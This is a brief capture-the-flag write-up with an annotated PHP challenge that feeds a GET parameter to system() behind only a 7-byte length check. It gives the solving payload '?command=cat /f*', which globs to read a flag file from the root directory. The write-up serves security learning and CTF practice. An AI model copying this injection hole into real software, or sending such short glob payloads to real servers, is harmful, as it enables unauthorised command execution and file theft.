bmzctf 刷题 rcee
<?php
// Challenge source as served by the target (intentionally vulnerable; kept
// byte-for-byte so the write-up below matches it).
// Per-client "sandbox" name: md5 of "box" + client IP + User-Agent. The
// User-Agent is a request header the client chooses, so this value only
// namespaces a directory per visitor; it is not an isolation boundary and
// the digest is echoed back, so the client learns its own directory name.
$sandbox = md5("box".$_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT']);
echo "you are in sandbox: ".$sandbox."<br/>";
// mkdir() is created relative to the script's current working directory and
// its failure (e.g. the directory already exists) is silenced with @; the
// script chdir()s into it regardless, so later commands run from there.
@mkdir($sandbox);
chdir($sandbox);
// OS command injection: an untrusted GET parameter is passed straight to
// system(). The only guard is a byte-length check (strlen counts bytes, not
// characters) allowing at most 7 bytes. A length cap is not a sanitizer:
// the shell still interprets metacharacters and globs, which is exactly what
// the payload below relies on. A real fix is an allowlist of permitted
// commands (or no shell at all), never a length limit.
// $_GET['command'] is read without isset()/??, so a request lacking the
// parameter raises an undefined-index notice and passes null on; what
// system() then does depends on the PHP version — TODO confirm on the
// target, but `$_GET['command'] ?? ''` plus validation is the safe form.
// Defensive note: on a real host this is detectable as a shell process
// spawned by the web server worker, and the web server log records the
// injected command in the query string.
$command = $_GET['command'];
if(strlen($command) < 8){
system($command);
}
// Prints this file's own source into the response (disclosing the logic
// above); acceptable for a CTF, never for production code.
show_source(__FILE__);
思路:读取根目录的flag,绕过8个字节的限制(代码中的 strlen($command) < 8 意味着命令最多 7 个字节,而 shell 通配符 /f* 会展开为根目录下以 f 开头的文件名)
payload:
?command=cat /f*